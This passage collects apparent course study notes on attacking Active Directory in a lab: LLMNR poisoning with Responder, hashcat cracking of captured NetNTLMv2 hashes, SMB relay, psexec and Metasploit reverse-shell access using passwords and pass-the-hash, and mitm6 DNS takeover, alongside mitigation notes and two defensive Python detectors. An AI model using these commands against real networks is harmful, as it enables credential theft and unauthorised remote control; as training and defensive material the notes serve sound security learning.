   - **Logical:** Abstract, representing the structure and organization.

2. **Management:**
   - **Physical:** Involves hardware maintenance and network upkeep.
   - **Logical:** Involves organizational design, policy management, and security configuration.

3. **Flexibility:**
   - **Physical:** Requires physical changes for expansion or relocation.
   - **Logical:** Flexible and adaptable through logical configurations.

4. **Scaling:**
   - **Physical:** Scaling may involve adding new hardware.
   - **Logical:** Scaling involves organizational and policy adjustments.

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/01. LLMNR Poisoning Overview.md:
--------------------------------------------------------------------------------

# LLMNR Poisoning Overview
> 05.05.2024

**What is Link-Local Multicast Name Resolution (LLMNR)?**
- It's used to identify hosts when DNS fails.
- Its key flaw is that the service hands over the user's username and NTLMv2 hash when responding.
- It is the successor of NBT-NS (*NetBIOS Name Service*).

**Example:**
![[LLMNR Poisoning Overview 01.png]]

1. The victim asks for `\\hackm` instead of `\\hackme`.
2. The server knows about `\\hackme` but not `\\hackm`.
3. The victim broadcasts on the network, asking if anyone knows about `\\hackm`.
4. The attacker intercepts this request, responds to it and asks the victim for its hash.
5. Crack the hash.

## Practical Example

**Step 1: Run Responder**

- Responds to the traffic broadcast by victims.
- Grabs the hash if one is received.

```bash
sudo responder -I tun0 -dwP
```

**Step 2: An Event Occurs**

- A victim broadcasts the message.

**Step 3: Get Dem Hashes**

- Take the hash from Responder offline to evaluate it further.

**Step 4: Crack Them Hashes**

- Use tools like Hashcat to crack the hash offline:
```bash
hashcat -m 5600 hash.txt rockyou.txt
```

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/02. Capturing Hashes with Responder.md:
--------------------------------------------------------------------------------

# Capturing Hashes with Responder
> 01.08.2024

---

**Getting hashes with Responder:**
```bash
┌──(mrmidnight㉿kali)-[~]
└─$ sudo responder -I eth0 -dwv
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [192.168.19.131]
    Responder IPv6             [fe80::20c:29ff:fe00:b31b]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-VMVNQ6S306J]
    Responder Domain Name      [GU6J.LOCAL]
    Responder DCE-RPC Port     [48918]

[+] Listening for events...

[*] [DHCP] Found DHCP server IP: 192.168.19.254, now waiting for incoming requests...
[*] [NBT-NS] Poisoned answer sent to 192.168.19.129 for name MARVEL (service: Domain Master Browser)
[*] [NBT-NS] Poisoned answer sent to 192.168.19.129 for name MARVEL (service: Browser Election)
[SMB] NTLMv2-SSP Client   : 192.168.19.129
[SMB] NTLMv2-SSP Username : MARVEL\fcastle
[SMB] NTLMv2-SSP Hash     : fcastle::MARVEL:87c6671cca544d9f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
[SMB] NTLMv2-SSP Client   : 192.168.19.129
[SMB] NTLMv2-SSP Username : MARVEL\fcastle
[SMB] NTLMv2-SSP Hash     : fcastle::MARVEL:a85d3509554eefe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
[SMB] NTLMv2-SSP Client   : 192.168.19.129
[SMB] NTLMv2-SSP Username : MARVEL\fcastle
[SMB] NTLMv2-SSP Hash     : fcastle::MARVEL:04312f82f72127a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
[SMB] NTLMv2-SSP Client   : 192.168.19.129
[SMB] NTLMv2-SSP Username : MARVEL\fcastle
[SMB] NTLMv2-SSP Hash     : fcastle::MARVEL:21cc3b2f6965a52d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
```

**Retrieved hash:**
```
fcastle::MARVEL:87c6671cca544d9f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
```

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/03. Cracking Our Captured Hashes.md:
--------------------------------------------------------------------------------

# Cracking Our Captured Hashes
> 01.08.2024
---

**Put the hash into a text file:**
```bash
vim hashes.txt

fcastle::MARVEL:87c6671cca544d9f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
```


**Cracking the hash with hashcat (on the Windows host machine):**
```powershell
.\hashcat.exe -m 5600 .\hashes\hash.txt .\wordlists\rockyou.txt
hashcat (v6.2.6) starting

Successfully initialized the NVIDIA main driver CUDA runtime library.

Failed to initialize NVIDIA RTC library.

* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
             CUDA SDK Toolkit required for proper device support and utilization.
             Falling back to OpenCL runtime.

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 3.0 CUDA 12.6.32) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #1: NVIDIA GeForce RTX 4070 SUPER, 12160/12281 MB (3070 MB allocatable), 56MCU

OpenCL API (OpenCL 3.0 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #2: Intel(R) UHD Graphics 770, 15072/30240 MB (2047 MB allocatable), 32MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1545 MB

Dictionary cache built:
* Filename..: .\wordlists\rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 0 secs

FCASTLE::MARVEL:87c6671cca544d9f:cbbfa1353dc46df44cf3fd145fa3a50e:010100000000000000da3635f9e3da0125eda9c0cb18161e00000000020008004700550036004a0001001e00570049004e002d0056004d0056004e005100360053003300300036004a0004003400570049004e002d0056004d0056004e005100360053003300300036004a002e004700550036004a002e004c004f00430041004c00030014004700550036004a002e004c004f00430041004c00050014004700550036004a002e004c004f00430041004c000700080000da3635f9e3da0106000400020000000800300030000000000000000100000000200000789577ce414708cf636af8ce914b79218f880f523f376082c2c30ba31de2eddc0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00310039002e003100330031000000000000000000:Password1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: FCASTLE::MARVEL:87c6671cca544d9f:cbbfa1353dc46df44c...000000
Time.Started.....: Thu Aug 01 17:13:17 2024 (0 secs)
Time.Estimated...: Thu Aug 01 17:13:17 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\wordlists\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        0 H/s (0.00ms) @ Accel:512 Loops:1 Thr:64 Vec:1
Speed.#2.........:   3897.8 kH/s (6.45ms) @ Accel:16 Loops:1 Thr:64 Vec:1
Speed.#*.........:   3897.8 kH/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 32768/14344384 (0.23%)
Rejected.........: 0/32768 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-0 Iteration:0-1
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: [Copying]
Candidates.#2....: 123456 -> dyesebel
Hardware.Mon.#1..: Temp: 43c Fan:  0% Util: 72% Core: 390MHz Mem:5001MHz Bus:16
Hardware.Mon.#2..: N/A

Started: Thu Aug 01 17:12:59 2024
Stopped: Thu Aug 01 17:13:18 2024
```

**Cracked password:**
```powershell
.\hashcat.exe -m 5600 .\hashes\hash.txt .\wordlists\rockyou.txt --show

FCASTLE::MARVEL:87c6671cca544d9f:cbbfa1353dc46df44cf3fd145fa3a50e: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:Password1
```

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/04. LLMNR Poison Mitigation.md:
--------------------------------------------------------------------------------

# LLMNR Poison Mitigation
> 05.05.2024


**The best defense against LLMNR Poisoning:**
- Disable LLMNR and NBT-NS.
- To disable LLMNR, select "Turn OFF Multicast Name Resolution" under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the Group Policy Editor.
- To disable NBT-NS, navigate to Network Connections > Network Adapter Properties > TCP/IPv4 Properties > Advanced tab > WINS tab and select "Disable NetBIOS over TCP/IP".

**Best action if disabling is not an option:**
- Require Network Access Control.
- Require strong user passwords. The more complex the better.

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/05. SMB Relay Attacks Overview.md:
--------------------------------------------------------------------------------

# SMB Relay Attacks Overview
> 01.08.2024
---

## What is SMB Relay?
Instead of cracking hashes gathered with Responder, we can relay those hashes to specific machines and potentially gain access.

**Requirements for SMB Relay:**
- SMB signing must be disabled or not enforced on the target.
- The relayed user's credentials must be admin on the target machines.
- Cannot relay to self.

## Identify Hosts Without SMB Signing
**With Nmap:**
```bash
nmap --script=smb2-security-mode.nse -p445

nmap --script=smb2-security-mode.nse -p445 10.0.2.25

...
Message signing enabled but not required
...
```

## SMB Relay
**Step 1: Edit the Responder config:**

```bash
sudo subl /etc/responder/Responder.conf

[Responder Core]

; Servers to start
SQL = On
SMB = Off      *
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = Off    *
DNS = On
LDAP = On
DCERPC = On
WINRM = On
SNMP = Off
MQTT = On
```

**Step 2: Run Responder:**
```bash
sudo responder -I eth0 -dw
```

**Step 3: Set up the relay:**
```bash
sudo ntlmrelayx.py -tf targets.txt -smb2support
```

**Step 4: Trigger an event:**
For example, the victim tries to open the attacker's IP in Explorer: `\\attackerip`

**Step 5: Win:**
Dumps the SAM hashes.

*Other wins:*
```bash
sudo ntlmrelayx.py -tf targets.txt -smb2support -i
```
This will try to get an interactive shell!

```bash
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
```
A basic command execution on the target machine.
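The `user::domain:challenge:ntproofstr:blob` line that Responder prints and that hashcat mode 5600 consumes is more than an opaque hash. Apart from the 8-byte server challenge and the 16-byte NTProofStr, the trailing blob is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP: the client's timestamp and challenge followed by AV_PAIRs that the *server* supplied, so a defender holding such a line can read which machine and domain the victim actually authenticated to, which SPN it was connecting to, and whether the response was bound to a TLS channel (the value that LDAP channel binding, listed in the defenses notes further down, relies on). The decoder below is an added example written for these notes, not code from the course, from Responder or from hashcat. The line it parses is constructed in `build_sample_line()`: the challenge and proof bytes are made up, while the names reuse the lab values from the notes above (the victim is `MARVEL\fcastle`, the answering host calls itself `WIN-VMVNQ6S306J` in `GU6J.LOCAL`, which is Responder's randomised identity, and the SPN names the Responder IP).

```python
"""Decode a NetNTLMv2 line (user::domain:challenge:ntproofstr:blob) into its fields."""
import struct
from datetime import datetime, timedelta, timezone

# AV_PAIR AvId values, MS-NLMP section 2.2.2.1
AV_IDS = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
    9: "MsvAvTargetName", 10: "MsvAvChannelBindings",
}
UTF16_IDS = {1, 2, 3, 4, 5, 9}  # string-valued pairs are UTF-16LE
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def parse_netntlmv2(line: str) -> dict:
    """Split the hashcat -m 5600 line and decode the NTLMv2_CLIENT_CHALLENGE blob.

    Blob layout: RespType(1) HiRespType(1) Reserved(6) TimeStamp(8)
    ChallengeFromClient(8) Reserved(4) AvPairs(...) [Reserved(4)].
    """
    parts = line.strip().split(":", 5)
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("expected user::domain:challenge:ntproofstr:blob")
    user, _, domain, challenge_hex, proof_hex, blob_hex = parts
    blob_hex = blob_hex.split(":", 1)[0]  # drop ':plaintext' appended by hashcat --show
    if len(challenge_hex) != 16 or len(proof_hex) != 32:
        raise ValueError("server challenge must be 8 bytes and NTProofStr 16 bytes")
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":
        raise ValueError("blob does not start with RespType/HiRespType 0x01 0x01")
    timestamp, client_challenge = struct.unpack_from("<Q8s", blob, 8)

    target_info = {}
    offset = 28
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, offset)
        offset += 4
        value = blob[offset:offset + av_len]
        offset += av_len
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        name = AV_IDS.get(av_id, f"MsvAvUnknown{av_id}")
        if av_id in UTF16_IDS:
            target_info[name] = value.decode("utf-16-le")
        elif av_id == 6 and len(value) == 4:
            target_info[name] = struct.unpack("<I", value)[0]
        elif av_id == 7 and len(value) == 8:
            target_info[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            target_info[name] = value.hex()

    # Z(16) in MsvAvChannelBindings means the client bound this response to no TLS channel
    cb = target_info.get("MsvAvChannelBindings")
    return {
        "user": user, "domain": domain,
        "server_challenge": challenge_hex, "nt_proof_str": proof_hex,
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": client_challenge.hex(),
        "target_info": target_info,
        "channel_bound": cb is not None and cb != "00" * 16,
    }


def server_outside_client_domain(parsed: dict) -> bool:
    """Triage hint: the answering server claims a NetBIOS domain other than the user's own."""
    return parsed["target_info"].get("MsvAvNbDomainName", "").upper() != parsed["domain"].upper()


def av_pair(av_id: int, value: bytes) -> bytes:
    return struct.pack("<HH", av_id, len(value)) + value


def build_sample_line() -> str:
    """Constructed capture (made-up challenge and proof); names taken from the lab notes."""
    ft = struct.pack("<Q", datetime_to_filetime(datetime(2024, 8, 1, tzinfo=timezone.utc)))
    pairs = (
        av_pair(2, "GU6J".encode("utf-16-le"))             # Responder's fake NetBIOS domain
        + av_pair(1, "WIN-VMVNQ6S306J".encode("utf-16-le"))  # Responder's fake machine name
        + av_pair(4, "GU6J.LOCAL".encode("utf-16-le"))
        + av_pair(7, ft)
        + av_pair(6, struct.pack("<I", 2))
        + av_pair(10, bytes(16))                           # no channel binding (SMB client)
        + av_pair(9, "cifs/192.168.19.131".encode("utf-16-le"))  # SPN of the host really contacted
        + av_pair(0, b"")
    )
    blob = (b"\x01\x01" + bytes(6) + ft + bytes.fromhex("0011223344556677")
            + bytes(4) + pairs + bytes(4))
    return f"fcastle::MARVEL:1122334455667788:00112233445566778899aabbccddeeff:{blob.hex()}"


if __name__ == "__main__":
    decoded = parse_netntlmv2(build_sample_line())
    for key, val in decoded.items():
        print(f"{key:17} {val}")
    print("server outside client domain:", server_outside_client_domain(decoded))
```

Read this way, the captured line tells an analyst that `MARVEL\fcastle` authenticated to a host that called itself `WIN-VMVNQ6S306J` in `GU6J.LOCAL`, neither of which exists in the MARVEL domain, and that the SPN was `cifs/192.168.19.131`, the poisoner's address. `server_outside_client_domain` is only a hint: legitimate workgroup or cross-domain servers also trigger it. The all-zero `MsvAvChannelBindings` is what an SMB client always sends; a server that enforces channel binding (LDAPS, HTTPS with EPA) rejects a relayed response whose binding does not match its own TLS channel, which is why the defenses notes pair LDAP signing with LDAP channel binding.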
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/07. SMB Relay Attack Defenses.md:
--------------------------------------------------------------------------------

# SMB Relay Attack Defenses
> 01.08.2024
---

## Mitigation Strategies:

- **Enable SMB Signing on all devices**
  - Pro: Completely stops the attack
  - Con: Can cause performance issues with file copies
- **Disable NTLM authentication on the network**
  - Pro: Completely stops the attack
  - Con: If Kerberos stops working, Windows defaults back to NTLM
- **Account tiering**
  - Pro: Limits domain admins to specific tasks (e.g. only log onto servers where DA is needed)
  - Con: Enforcing the policy may be difficult
- **Local admin restrictions**
  - Pro: Can prevent a lot of lateral movement
  - Con: Potential increase in the amount of service desk tickets

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/08. Gaining Shell Access.md:
--------------------------------------------------------------------------------

# Gaining Shell Access
> 01.08.2024
---

## Gaining Shell Access:

**Via Metasploit / password needed:**
```bash
msfconsole -q
use exploit/windows/smb/psexec
```
Set `SMBPass` either to the enumerated password or to a hash.

**Via psexec / password needed:**
```bash
psexec.py marvel.local/fcastle:'Password1'@10.0.2.5
```
A quieter option.
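The psexec-style access described in this note, whether through Metasploit or Impacket, is not silent on the target: the later `impacket-psexec` transcripts show a randomly named executable being uploaded to the `ADMIN$` share (the Windows directory) and a four-letter random service being created and started, and Windows records every service installation as System log event 7045 ("A service was installed in the system"). The triage below is an added defender's example written for these notes, not course or Impacket code. It parses constructed 7045 records in the classic event-text layout; the first record mirrors the psexec names seen in this note, the second is modelled on how `impacket-smbexec` drives `cmd.exe` through a service (an assumption from general knowledge, not something these notes show), and the last two are ordinary Windows services that must not be flagged.

```python
"""Triage Windows System-log 7045 records for psexec-style remote service installs."""
from typing import Dict, List

# Constructed records, not real logs. Record 1 mirrors the impacket-psexec transcript
# in this note; record 2 is modelled on impacket-smbexec's cmd.exe service (assumption,
# not shown in the notes); records 3 and 4 are benign built-in services.
SAMPLE_EVENTS = [
    """Event ID: 7045
Computer: THEPUNISHER.marvel.local
Service Name:  qaUG
Service File Name:  %SystemRoot%\\jKPkWteS.exe
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem""",
    """Event ID: 7045
Computer: THEPUNISHER.marvel.local
Service Name:  BTOBTO
Service File Name:  %COMSPEC% /Q /c echo whoami ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > %TEMP%\\execute.bat & %COMSPEC% /Q /c %TEMP%\\execute.bat & del %TEMP%\\execute.bat
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem""",
    """Event ID: 7045
Computer: THEPUNISHER.marvel.local
Service Name:  Sense
Service File Name:  "C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe"
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem""",
    """Event ID: 7045
Computer: THEPUNISHER.marvel.local
Service Name:  Dnscache
Service File Name:  C:\\Windows\\System32\\svchost.exe -k NetworkService -p
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  NT AUTHORITY\\NetworkService""",
]

# ADMIN$ maps to the Windows directory, so an uploaded payload sits directly under it
WINDOWS_DIR_PREFIXES = ("%systemroot%\\", "c:\\windows\\")


def parse_event(record: str) -> Dict[str, str]:
    """Turn 'Key:  value' lines into a dict; the first colon separates key from value."""
    fields: Dict[str, str] = {}
    for line in record.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def looks_generated(name: str, length: int) -> bool:
    """Fixed length, ASCII letters only, mixed case: the shape of Impacket's random names."""
    return (len(name) == length and name.isascii() and name.isalpha()
            and any(c.islower() for c in name) and any(c.isupper() for c in name))


def assess_service_install(fields: Dict[str, str]) -> dict:
    """Score one 7045 record; returns the reasons it matches remote-exec tooling, if any."""
    name = fields.get("Service Name", "")
    image = fields.get("Service File Name", "").strip('"')
    image_lc = image.lower()
    reasons: List[str] = []
    for prefix in WINDOWS_DIR_PREFIXES:
        if image_lc.startswith(prefix):
            rest = image_lc[len(prefix):]
            # nothing but '<8 letters>.exe' after the prefix: dropped straight into ADMIN$
            if "\\" not in rest and rest.endswith(".exe") and looks_generated(image[len(prefix):-4], 8):
                reasons.append("random 8-letter .exe placed directly in the Windows directory (ADMIN$ root)")
    if looks_generated(name, 4):
        reasons.append("random 4-letter service name")
    if "%comspec%" in image_lc or "cmd.exe /q /c" in image_lc:
        reasons.append("service binary is a cmd.exe command line rather than an executable")
    if reasons and fields.get("Service Start Type", "").lower() == "demand start":
        reasons.append("demand-start service (one-shot, typical of remote execution tooling)")
    return {"computer": fields.get("Computer", ""), "service": name, "image": image,
            "suspicious": bool(reasons), "reasons": reasons}


def scan(records: List[str]) -> List[dict]:
    return [assess_service_install(parse_event(r)) for r in records]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if hit["suspicious"] else "ok"
        print(f"{flag:10} {hit['computer']} {hit['service']!r} -> {hit['image']}")
        for reason in hit["reasons"]:
            print("           -", reason)
```

The heuristics are deliberately tied to the naming Impacket uses, so they will not catch Sysinternals PsExec, which installs a fixed `PSEXESVC` service, nor tooling that renames its payload; in a real deployment the 7045 record would be correlated with the preceding 4624 logon type 3 from the same source and with file creation in `C:\Windows`, and the service name and image path would be checked against an allow-list of known installers.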
**Via psexec / hash needed:**
```bash
psexec.py administrator@10.0.2.5 -hashes LM:NT
```

## Lab hacking:

MARVEL-DC: `192.168.19.128`
THEPUNISHER: `192.168.19.129`
SPIDERMAN: `192.168.19.130`
HackerMan: `192.168.19.131`


**Setting up Metasploit:**

```bash
msfconsole -q
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.19.129
set smbdomain MARVEL.local
set smbuser fcastle
set smbpass Password1
run
```

**Background the session and interact with sessions:**
```bash
meterpreter > background
sessions
sessions 1
```

**Hash attack:**
`administrator:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f`
```bash
set smbuser administrator
unset smbdomain
set smbpass aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
run

[*] Started reverse TCP handler on 192.168.19.131:4444
[*] 192.168.19.129:445 - Connecting to the server...
[*] 192.168.19.129:445 - Authenticating to 192.168.19.129:445 as user 'administrator'...
[*] 192.168.19.129:445 - Selecting PowerShell target
[*] 192.168.19.129:445 - Executing the payload...
[+] 192.168.19.129:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (201798 bytes) to 192.168.19.129
[*] Meterpreter session 2 opened (192.168.19.131:4444 -> 192.168.19.129:49511) at 2024-08-01 12:43:50 -0500

meterpreter >
```
Password reuse! peterparker's hash is the same as frankcastle's hash.

**Manual way / with psexec:**
```bash
impacket-psexec MARVEL/fcastle:'Password1'@192.168.19.129

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 192.168.19.129.....
[*] Found writable share ADMIN$
[*] Uploading file jKPkWteS.exe
[*] Opening SVCManager on 192.168.19.129.....
[*] Creating service qaUG on 192.168.19.129.....
[*] Starting service qaUG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.4651]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```

**Manual way / with psexec + hash:**
```bash
impacket-psexec administrator@192.168.19.129 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 192.168.19.129.....
[*] Found writable share ADMIN$
[*] Uploading file GJJwOpGH.exe
[*] Opening SVCManager on 192.168.19.129.....
[*] Creating service MRXo on 192.168.19.129.....
[*] Starting service MRXo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.4651]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```


**Manual way / smbexec:**
```bash
impacket-smbexec MARVEL/fcastle:'Password1'@192.168.19.129

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
```

*With hash:*
```bash
impacket-smbexec administrator@192.168.19.129 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>

```


**Manual way / wmiexec:**

```bash
impacket-wmiexec MARVEL/fcastle:'Password1'@192.168.19.129
```

*With hash:*
```bash
impacket-wmiexec administrator@192.168.19.129 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
```

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/09. IPv6 Attacks Overview.md:
--------------------------------------------------------------------------------

# IPv6 Attacks Overview
> 02.08.2024
---

## IPv6 Scanning and Reconnaissance

IPv6's large address space makes it difficult to scan for active hosts. However, attackers can use techniques like:

- **Multicast scanning**: Sending multicast packets to discover active hosts.
- **IPv6 neighbor discovery**: Using the Neighbor Discovery Protocol (NDP) to discover hosts on the same network.

## IPv6 Spoofing

Spoofing involves sending packets with a forged source IP address. In IPv6, this can be done using:

- **IPv6 extension headers**: Maliciously crafting extension headers to disguise the source IP address.
- **IPv6 fragmentation**: Fragmenting packets to evade security controls.

## IPv6 Neighbor Discovery Protocol (NDP) Attacks

NDP is used for address resolution and router discovery. Attacks include:

- **NDP spoofing**: Spoofing NDP messages to hijack traffic or disrupt connectivity.
- **Router advertisement spoofing**: Spoofing router advertisements to redirect traffic.

## IPv6 Duplicate Address Detection (DAD) Attacks

DAD is used to detect duplicate IP addresses on a network.
Attacks include:

- **DAD spoofing**: Spoofing DAD messages to disrupt connectivity or hijack traffic.

## IPv6 Router Advertisement (RA) Guard Evasion

RA Guard is a security feature that filters out malicious router advertisements. Attacks involve:

- **RA Guard evasion**: Using techniques like fragmentation or extension headers to evade RA Guard.

## IPv6 Man-in-the-Middle (MitM) Attacks

MitM attacks involve intercepting and modifying traffic. In IPv6, this can be done using:

- **IPv6 spoofing**: Spoofing IP addresses to intercept traffic.
- **NDP spoofing**: Spoofing NDP messages to hijack traffic.

## IPv6 Denial of Service (DoS) Attacks

DoS attacks involve overwhelming a network or host with traffic. In IPv6, this can be done using:

- **IPv6 flooding**: Sending large amounts of traffic to overwhelm a network or host.
- **IPv6 fragmentation**: Fragmenting packets to evade security controls and overwhelm a network or host.

To mitigate these attacks, it's essential to implement IPv6 security measures, such as:

- **IPv6 firewalls**: Configuring firewalls to filter out malicious IPv6 traffic.
- **IPv6 intrusion detection and prevention systems**: Monitoring and blocking suspicious IPv6 traffic.
- **Secure neighbor discovery**: Implementing Secure Neighbor Discovery (SEND) to authenticate NDP messages.
- **RA Guard**: Configuring RA Guard to filter out malicious router advertisements.

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/10. IPv6 DNS Takeover via mitm6.md:
--------------------------------------------------------------------------------

# IPv6 DNS Takeover via mitm6
> 03.08.2024
---
### IP Addresses
MARVEL-DC: `192.168.19.128`
THEPUNISHER: `192.168.19.129`
SPIDERMAN: `192.168.19.130`
HackerMan: `192.168.19.131`

**Set up the NTLM relay:**
```bash
impacket-ntlmrelayx -6 -t ldaps://192.168.19.128 -wh fakewpad.marvel.local -l lootme

[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
```

**Running mitm6:**
```bash
sudo mitm6 -d marvel.local
```

**Rebooting the PUNISHER machine as the trigger:**
reboot...

**Result:**
It will create a folder that contains domain information and, in the best case, create a user on the domain controller!

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/11. IPv6 Attack Defenses.md:
--------------------------------------------------------------------------------

# IPv6 Attack Defenses
> 02.08.2024
---

## Mitigation Strategies

IPv6 poisoning abuses the fact that Windows queries for an IPv6 address even in IPv4-only environments.
If you do not use IPv6 internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working:

